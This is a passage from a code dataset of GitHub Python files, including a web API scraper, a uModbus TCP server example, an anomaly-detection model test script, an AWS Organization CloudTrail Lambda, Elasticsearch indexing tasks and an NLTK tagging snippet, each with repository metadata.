id_dict[key] + '.csv'\n save_file_path = path + save_file_name\n df.to_csv(save_file_path)\n\ndef ScrapeData(dict, save_path):\n i = 1\n e = 0\n for key in dict:\n # randsleep = np.random.randint(low = 1, high = 10, size = 1)\n # time.sleep(randsleep)\n payload = {\n 'daynumber':'all',\n 'id': key,\n 'sign':'false',\n 'langue':'en'\n }\n\n headers = {\"accept\":\"application/json, text/plain, 
*/*\",\"accept-language\":\"zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7\",\"cache-control\":\"no-cache\",\"content-type\":\"application/x-www-form-urlencoded\",\"pragma\":\"no-cache\",\"sec-fetch-mode\":\"cors\",\"sec-fetch-site\":\"same-origin\"}\n r = requests.post('https://dapptotal.com/api/view',headers = headers, data = payload).text\n try:\n saveAsCSV(r, key, save_path)\n print(str(i) + \" file saved: \" + dict[key])\n i = i + 1\n except:\n print(\"error occurred.\")\n e = e + 1\n i = i + 1\n print(f\"{i} files scrapped, {e} failed.\")\n\nif __name__ == '__main__':\n # ScrapeData(id_dict, './csv_data/tron/highrisk/')\n # ScrapeData(id_dict, './top15_data/highrisk/')\n build_db('./contract_db/all_cate_top25_index.csv','./contract_db/all_cate_top25/')\n\n", "repo_name": "Gullintani/Ethereum-User-Profile", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 6364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 98, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "19065096617", "text": "#!/usr/bin/env python\n# scripts/examples/simple_tcp_server.py\nimport logging\nfrom socketserver import TCPServer\nfrom collections import defaultdict\nfrom argparse import ArgumentParser\n\nfrom umodbus import conf\nfrom umodbus.server.tcp import RequestHandler, get_server\nfrom umodbus.utils import log_to_stream\n\n# Add stream handler to logger 'uModbus'.\nlog_to_stream(level=logging.DEBUG)\n\n# A very simple data store which maps addresses against their values.\ndata_store = defaultdict(int)\n\n# Enable values to be signed (default is False).\nconf.SIGNED_VALUES = True\n\n# Parse command line arguments\nparser = ArgumentParser()\nparser.add_argument(\"-b\", \"--bind\", default=\"localhost:502\")\n\nargs = parser.parse_args()\nif \":\" not in args.bind:\n args.bind += \":502\"\nhost, port = args.bind.rsplit(\":\", 1)\nport = int(port)\n\nTCPServer.allow_reuse_address = True\ntry:\n app = get_server(TCPServer, (host, port), RequestHandler)\nexcept PermissionError:\n print(\"You don't have permission to bind on {}\".format(args.bind))\n print(\"Hint: try with a different port (ex: --bind localhost:50200)\")\n exit(1)\n\n\n@app.route(slave_ids=[1], function_codes=[1, 2], addresses=list(range(0, 10)))\ndef read_data_store(slave_id, function_code, address):\n \"\"\"\" Return value of address. 
\"\"\"\n return data_store[address]\n\n\n@app.route(slave_ids=[1], function_codes=[5, 15], addresses=list(range(0, 10)))\ndef write_data_store(slave_id, function_code, address, value):\n \"\"\"\" Set value for address. \"\"\"\n data_store[address] = value\n\n\nif __name__ == '__main__':\n try:\n app.serve_forever()\n finally:\n app.shutdown()\n app.server_close()\n", "repo_name": "AdvancedClimateSystems/uModbus", "sub_path": "scripts/examples/simple_tcp_server.py", "file_name": "simple_tcp_server.py", "file_ext": "py", "file_size_in_byte": 1647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 197, "dataset": "github-code", "pt": "52", "api": [{"api_name": "umodbus.utils.log_to_stream", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "umodbus.conf.SIGNED_VALUES", "line_number": 19, "usage_type": "attribute"}, {"api_name": "umodbus.conf", "line_number": 19, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "socketserver.TCPServer.allow_reuse_address", "line_number": 31, "usage_type": "attribute"}, {"api_name": "socketserver.TCPServer", "line_number": 31, "usage_type": "name"}, {"api_name": "umodbus.server.tcp.get_server", "line_number": 33, "usage_type": "call"}, {"api_name": "socketserver.TCPServer", "line_number": 33, "usage_type": "argument"}, {"api_name": "umodbus.server.tcp.RequestHandler", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "73963646565", "text": "import sys \nimport torch\nimport torch.nn as nn\n\nfrom MobileNet import *\nfrom UNSWBINARYDATASET import *\nfrom UNSWORIGINDATASET import *\nfrom UNSWGRAYDATASET import *\n\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\n\ndef test(model, test_loader, ptfile):\n print(\"Model weight load\")\n model.load_state_dict(torch.load('./ptfiles/'+ptfile))\n model = model.cuda()\n print(\"Model weight load Complete\")\n model.eval()\n \n correct = 0\n Category = []\n print(\"Testing.....\")\n for idx, (input, target) in enumerate(test_loader):\n input = np.array(input)\n input = torch.tensor(input, dtype=torch.float32)\n\n input = input.unsqueeze(1)\n input = input.float()\n input = input.cuda()\n \n output = model(input)\n # print(\"Output type : \", type(output))\n # print(\"Target type : \", type(target))\n\n # print(\"Output[0] type : \", type(output[0]))\n # print(\"Target[0] type : \", type(target[0]))\n tmp_correct= 0\n # output = output.cpu().detach().numpy()\n output = torch.argmax(output, dim=1)\n output = output.cpu()\n Category = Category + output.tolist()\n\n for i in range(len(output)):\n\n if(output[i] == target[i]):\n correct += 1\n tmp_correct += 1\n \n print(\"Current acc => \", tmp_correct / len(output))\n acc = correct/len(test_data)\n print(\"==========================================\")\n print(\"Total Acc =>\", acc)\n print(\"==========================================\")\n\n df = pd.DataFrame(Category, columns=['Category'])\n df.to_csv('./results/'+ptfile+'.csv', index=False)\n print(ptfile, \"done!\")\n\n return acc\n\nclass AvalancheDataset(Dataset):\n def __init__(self):\n data = pd.read_csv('./abnormals/total.csv', index_col=False)\n # data = pd.read_csv('./abnormals/UDP_Flooding.csv', index_col=False)\n data = data.drop(['No.'], axis=1).values\n patches = []\n for dat in data:\n patches.append(make_patch(dat, (32, 
32)))\n \n self.x_test = []\n self.y_test = []\n\n for idx,_ in enumerate(patches):\n pf = PacketFeature((224, 224))\n if( (idx + 49) > len(patches)):\n break\n \n for count in range(49):\n pf.append(patches[idx+count])\n\n self.y_test.append(1)\n self.x_test.append(pf.frame)\n \n def __len__(self):\n return len(self.y_test)\n \n def __getitem__(self, idx):\n return self.x_test[idx], self.y_test[idx]\n \n\nif __name__ == \"__main__\":\n pt_file = sys.argv[1]\n print(\"Model load\")\n model = MobileNetV1(ch_in=1, n_classes=2)\n print(\"Model load Complete\")\n\n print(\"loading test_data\")\n # test_data = MyDataSet_TEST()\n test_data = AvalancheDataset()\n # test_data = UNSWORIGINDATASETTEST()\n # test_data = UNSWGRAYDATASETTEST()\n print(\"loading test_data complete\")\n\n test_loader = DataLoader(test_data, batch_size = 64, shuffle=False)\n \n # pt_files = [\n # 'binarytraining_9.pt', 'binarytraining_19.pt',\n # 'binarytraining_29.pt', 'binarytraining_39.pt',\n # 'binarytraining_49.pt', 'binarytraining_59.pt',\n # 'binarytraining_69.pt', 'binarytraining_79.pt',\n # 'binarytraining_89.pt', 'binarytraining_99.pt',\n # 'binarytraining_109.pt','binarytraining_119.pt',\n # 'binarytraining_129.pt','binarytraining_139.pt',\n # 'binarytraining_149.pt'\n # ]\n # pt_files = [\n # 'graytraining_9.pt', 'graytraining_19.pt',\n # 'graytraining_29.pt', 'graytraining_39.pt',\n # 'graytraining_49.pt', 'graytraining_59.pt',\n # 'graytraining_69.pt', 'graytraining_79.pt',\n # 'graytraining_89.pt', 'graytraining_99.pt',\n # 'graytraining_109.pt', 'graytraining_119.pt',\n # 'graytraining_129.pt', 'graytraining_139.pt',\n # 'graytraining_149.pt'\n # ]\n # pt_files = [\n # 'originaltraining_9.pt', 'originaltraining_19.pt',\n # 'originaltraining_29.pt', 'originaltraining_39.pt',\n # 'originaltraining_49.pt', 'originaltraining_59.pt',\n # 'originaltraining_69.pt', 'originaltraining_79.pt',\n # 'originaltraining_89.pt', 'originaltraining_99.pt',\n # 'originaltraining_109.pt', 'originaltraining_119.pt',\n # 'originaltraining_129.pt', 'originaltraining_139.pt',\n # 'originaltraining_149.pt'\n # ]\n test_acc_list = []\n test_acc_list.append(test(model, test_loader, pt_file))\n\n # for ptfile in pt_files:\n # test_acc_list.append(test(model, test_loader, ptfile))\n \n test_acc_list = np.array(test_acc_list)\n np.save(\"origin_test_acc_list\", test_acc_list)\n \n\n", "repo_name": "alstjrdld1/gray_anomaly_detection", "sub_path": "code/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.load", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 61, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "8127325188", "text": "from __future__ import print_function\nimport logging\nimport os\nimport re\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom crhelper import CfnResource\n\n# Setup Default Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\"\"\"\nThe purpose of this script is to create and configure an 
Organization CloudTrail.\n\"\"\"\n\n# Initialise the helper, all inputs are optional, this example shows the defaults\nhelper = CfnResource(json_logging=False, log_level=\"DEBUG\", boto_level=\"CRITICAL\")\n\nAWS_SERVICE_PRINCIPAL = \"cloudtrail.amazonaws.com\"\n\ntry:\n # Process Environment Variables\n if \"LOG_LEVEL\" in os.environ:\n LOG_LEVEL = os.environ.get(\"LOG_LEVEL\")\n if isinstance(LOG_LEVEL, str):\n log_level = logging.getLevelName(LOG_LEVEL.upper())\n logger.setLevel(log_level)\n else:\n raise ValueError(\"LOG_LEVEL parameter is not a string\")\n\n # Required variables\n cloudtrail_regex = \"^[A-Za-z0-9][a-zA-Z0-9-\\\\-_.]{2,127}$\"\n CLOUDTRAIL_NAME = os.environ.get(\"CLOUDTRAIL_NAME\", \"\")\n if not CLOUDTRAIL_NAME or not re.match(cloudtrail_regex, CLOUDTRAIL_NAME):\n raise ValueError(\"Missing or Invalid CloudTrail Name\")\n\n S3_BUCKET_NAME = os.environ.get(\"S3_BUCKET_NAME\", \"\")\n bucket_regex = \"^[a-zA-Z0-9-\\\\-_.]{2,62}$\"\n if not S3_BUCKET_NAME or not re.match(bucket_regex, S3_BUCKET_NAME):\n raise ValueError(\"Missing or Invalid S3 Bucket Name\")\n\n KMS_KEY_ID = os.environ.get(\"KMS_KEY_ID\", \"\")\n if not KMS_KEY_ID:\n raise ValueError(\"Missing KMS Key ID ARN\")\n\n ENABLE_S3_DATA_EVENTS = (os.environ.get(\"ENABLE_S3_DATA_EVENTS\", \"false\")).lower() in \"true\"\n ENABLE_LAMBDA_DATA_EVENTS = (os.environ.get(\"ENABLE_LAMBDA_DATA_EVENTS\", \"false\")).lower() in \"true\"\n ENABLE_DATA_EVENTS_ONLY = (os.environ.get(\"ENABLE_DATA_EVENTS_ONLY\", \"false\")).lower() in \"true\"\n\n # Optional Variables\n S3_KEY_PREFIX = os.environ.get(\"S3_KEY_PREFIX\", \"\")\n CLOUDWATCH_LOG_GROUP_ARN = os.environ.get(\"CLOUDWATCH_LOG_GROUP_ARN\", \"\")\n CLOUDWATCH_LOG_GROUP_ROLE_ARN = os.environ.get(\"CLOUDWATCH_LOG_GROUP_ROLE_ARN\", \"\")\n TAG_KEY1 = os.environ.get(\"TAG_KEY1\", \"\")\n TAG_VALUE1 = os.environ.get(\"TAG_VALUE1\", \"\")\n\n cloudtrail = boto3.client(\"cloudtrail\")\nexcept Exception as e:\n helper.init_failure(e)\n\n\ndef get_data_event_config() -> dict:\n \"\"\"\n Creates the CloudTrail event selectors configuration\n :return: event_selectors\n \"\"\"\n\n if ENABLE_DATA_EVENTS_ONLY:\n event_selectors = {\n \"ReadWriteType\": \"All\",\n \"IncludeManagementEvents\": False,\n \"DataResources\": [],\n }\n else:\n event_selectors = {\n \"ReadWriteType\": \"All\",\n \"IncludeManagementEvents\": True,\n \"DataResources\": [],\n }\n\n s3_data_resource = {\"Type\": \"AWS::S3::Object\", \"Values\": [\"arn:aws:s3:::\"]}\n\n lambda_data_resource = {\n \"Type\": \"AWS::Lambda::Function\",\n \"Values\": [\"arn:aws:lambda\"],\n }\n\n if ENABLE_S3_DATA_EVENTS:\n event_selectors[\"DataResources\"].append(s3_data_resource)\n logger.info(\"S3 Data Events Added to Event Selectors\")\n\n if ENABLE_LAMBDA_DATA_EVENTS:\n event_selectors[\"DataResources\"].append(lambda_data_resource)\n logger.info(\"Lambda Data Events Added to Event Selectors\")\n\n return event_selectors\n\n\ndef enable_aws_service_access(service_principal: str):\n \"\"\"\n Enables the AWS Service Access for the provided service principal\n :param service_principal: AWS Service Principal format: service_name.amazonaws.com\n :return: None\n \"\"\"\n logger.info(\"Enable AWS Service Access for: \" + str(service_principal))\n\n try:\n organizations = boto3.client(\"organizations\")\n organizations.enable_aws_service_access(ServicePrincipal=service_principal)\n except ClientError as ce:\n logger.error(f\"Client Error: {str(ce)}\")\n raise\n except Exception as exc:\n logger.error(f\"Exception: {str(exc)}\")\n 
raise\n\n\ndef get_cloudtrail_parameters(is_create) -> dict:\n \"\"\"\n Dynamically creates a parameter dict for the CloudTrail create_trail and update_trail API calls.\n :param is_create: True = create, False = update\n :return: cloudtrail_params dict\n \"\"\"\n cloudtrail_params = {\n \"Name\": CLOUDTRAIL_NAME,\n \"S3BucketName\": S3_BUCKET_NAME,\n \"IncludeGlobalServiceEvents\": True,\n \"IsMultiRegionTrail\": True,\n \"EnableLogFileValidation\": True,\n \"KmsKeyId\": KMS_KEY_ID,\n \"IsOrganizationTrail\": True,\n }\n\n if is_create and TAG_KEY1 and TAG_VALUE1:\n cloudtrail_params[\"TagsList\"] = [{\"Key\": TAG_KEY1, \"Value\": TAG_VALUE1}]\n\n if S3_KEY_PREFIX:\n cloudtrail_params[\"S3KeyPrefix\"] = S3_KEY_PREFIX\n\n if CLOUDWATCH_LOG_GROUP_ARN and CLOUDWATCH_LOG_GROUP_ROLE_ARN:\n cloudtrail_params[\"CloudWatchLogsLogGroupArn\"] = CLOUDWATCH_LOG_GROUP_ARN\n cloudtrail_params[\"CloudWatchLogsRoleArn\"] = CLOUDWATCH_LOG_GROUP_ROLE_ARN\n\n return cloudtrail_params\n\n\n@helper.create\ndef create(event, context) -> str:\n \"\"\"\n CloudFormation Create Event. Creates a CloudTrail with the provided parameters\n :param event: event data\n :param context: runtime information\n :return: OrganizationTrailResourceId\n \"\"\"\n logger.info(\"Create Event\")\n try:\n enable_aws_service_access(AWS_SERVICE_PRINCIPAL)\n\n cloudtrail.create_trail(**get_cloudtrail_parameters(True))\n logger.info(\"Created an Organization CloudTrail\")\n\n event_selectors = get_data_event_config()\n\n if event_selectors and event_selectors[\"DataResources\"]:\n\n cloudtrail.put_event_selectors(\n TrailName=CLOUDTRAIL_NAME, EventSelectors=[event_selectors]\n )\n\n logger.info(\"Data Events Enabled\")\n\n cloudtrail.start_logging(Name=CLOUDTRAIL_NAME)\n except ClientError as ce:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n return \"OrganizationTrailResourceId\"\n\n\n@helper.update\ndef update(event, context):\n \"\"\"\n CloudFormation Update Event. Updates CloudTrail with the provided parameters.\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"Update Event\")\n\n try:\n cloudtrail.update_trail(**get_cloudtrail_parameters(False))\n logger.info(\"Updated Organization CloudTrail\")\n\n event_selectors = get_data_event_config()\n\n if event_selectors and event_selectors[\"DataResources\"]:\n cloudtrail.put_event_selectors(\n TrailName=CLOUDTRAIL_NAME, EventSelectors=[event_selectors]\n )\n\n logger.info(\"Data Events Updated\")\n except ClientError as ce:\n if ce.response[\"Error\"][\"Code\"] == \"TrailNotFoundException\":\n logger.error(\"Trail Does Not Exist\")\n raise ValueError(f\"TrailNotFoundException: {str(ce)}\")\n else:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n\n@helper.delete\ndef delete(event, context):\n \"\"\"\n CloudFormation Delete Event. 
Deletes the provided CloudTrail\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"Delete Event\")\n try:\n cloudtrail.delete_trail(Name=CLOUDTRAIL_NAME)\n except ClientError as ce:\n if ce.response[\"Error\"][\"Code\"] == \"TrailNotFoundException\":\n logger.error(f\"Trail Does Not Exist {str(ce)}\")\n raise ValueError(f\"TrailNotFoundException: {str(ce)}\")\n else:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n logger.info(\"Deleted the Organizations CloudTrail\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Lambda Handler\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"....Lambda Handler Started....\")\n helper(event, context)\n", "repo_name": "mynameisakash/aws_sec_ref_arch", "sub_path": "solutions/cloudtrail/cloudtrail-org/code/src/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "crhelper.CfnResource", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.getLevelName", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 35, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 38, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 47, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 48, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 54, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 55, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 56, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 56, 
"usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 58, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 109, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 111, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 174, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 206, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "9810019721", "text": "import logging\n\nfrom django.utils import timezone\nfrom elasticsearch import NotFoundError\n\nfrom signals.apps.search.documents.signal import SignalDocument\nfrom signals.apps.signals.models import Signal\nfrom signals.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef save_to_elastic(signal_id):\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n signal = Signal.objects.get(id=signal_id)\n signal_document = SignalDocument.create_document(signal)\n signal_document.save()\n\n\n@app.task\ndef rebuild_index():\n log.info('rebuild_index - start')\n\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n SignalDocument.index_documents()\n log.info('rebuild_index - done!')\n\n\n@app.task\ndef delete_from_elastic(signal):\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n if isinstance(signal, int):\n signal = Signal.objects.get(id=signal)\n\n signal_document = SignalDocument.create_document(signal)\n\n try:\n signal_document.delete()\n except NotFoundError:\n log.warning(f'Signal {signal.id} not found in Elasticsearch')\n\n\n@app.task\ndef index_signals_updated_in_date_range(from_date=None, to_date=None):\n \"\"\"\n Index all Signals updated in the given date range (Copied from the elastic_index management command)\n\n The from_date and to_date are optional. 
By default, this task will update all signals changed in the last 2 days.\n \"\"\"\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n if from_date:\n from_date = timezone.make_aware(timezone.datetime.strptime(from_date, '%Y-%m-%d'))\n else:\n # Default is 2 days ago\n from_date = timezone.now() - timezone.timedelta(days=2)\n\n from_date = from_date.replace(hour=00, minute=00, second=00) # Beginning of the day given in from_date\n\n if to_date:\n to_date = timezone.make_aware(timezone.datetime.strptime(to_date, '%Y-%m-%d'))\n else:\n # Default is today\n to_date = timezone.now()\n\n to_date = to_date + timezone.timedelta(days=1)\n to_date = to_date.replace(hour=00, minute=00, second=00) # Beginning of the day after the to_date\n\n log.info(f'index_signals_updated_in_date_range - from {from_date}, to {to_date}')\n\n if to_date < from_date:\n log.warning('To date cannot be before the from date')\n return\n\n signal_qs = Signal.objects.filter(updated_at__range=[from_date, to_date]).order_by('-updated_at')\n SignalDocument.index_documents(queryset=signal_qs)\n\n log.info('index_signals_updated_in_date_range - done!')\n", "repo_name": "Amsterdam/signals", "sub_path": "app/signals/apps/search/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 2678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 15, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 15, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "signals.apps.signals.models.Signal", "line_number": 18, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.create_document", "line_number": 19, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 19, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 13, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 13, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 27, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 27, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.index_documents", "line_number": 30, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 30, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 23, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 23, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 36, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 36, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.get", "line_number": 40, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": 
"signals.apps.signals.models.Signal", "line_number": 40, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.create_document", "line_number": 42, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 42, "usage_type": "name"}, {"api_name": "elasticsearch.NotFoundError", "line_number": 46, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 34, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 34, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 57, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 57, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 61, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.timezone.datetime.strptime", "line_number": 61, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 64, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 69, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 69, "usage_type": "name"}, {"api_name": "django.utils.timezone.datetime.strptime", "line_number": 69, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 72, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 74, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 74, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "signals.apps.signals.models.Signal", "line_number": 83, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.index_documents", "line_number": 84, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 84, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 50, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "31044616100", "text": "import nltk\n#nltk.download()\n#nltk.download('punkt')\n#nltk.download('mac_morpho')\n\ntagged_sents = nltk.corpus.mac_morpho.tagged_sents()\nt0 = nltk.DefaultTagger('N')\nt1 = nltk.UnigramTagger(tagged_sents, backoff=t0)\n#t2 = nltk.BigramTagger(tagged_sents, backoff=t1)\n#t3 = nltk.TrigramTagger(tagged_sents, backoff=t2)\n\n\n\n#t3_alt = nltk.TrigramTagger(tagged_sents)\n\"\"\"\nfrom pickle import dump\noutput = open('mac_morpho.pkl', 'wb')\ndump(t3, output, -1)\noutput.close()\n\nfrom pickle import load\ninput = open('mac_morpho.pkl', 'rb')\ntagger = load(input)\ninput.close()\n\"\"\"\n\n\nl='Ontem, o João Antunes comeu peixe ao almoço'\nprint(l)\n#separa o texto em 
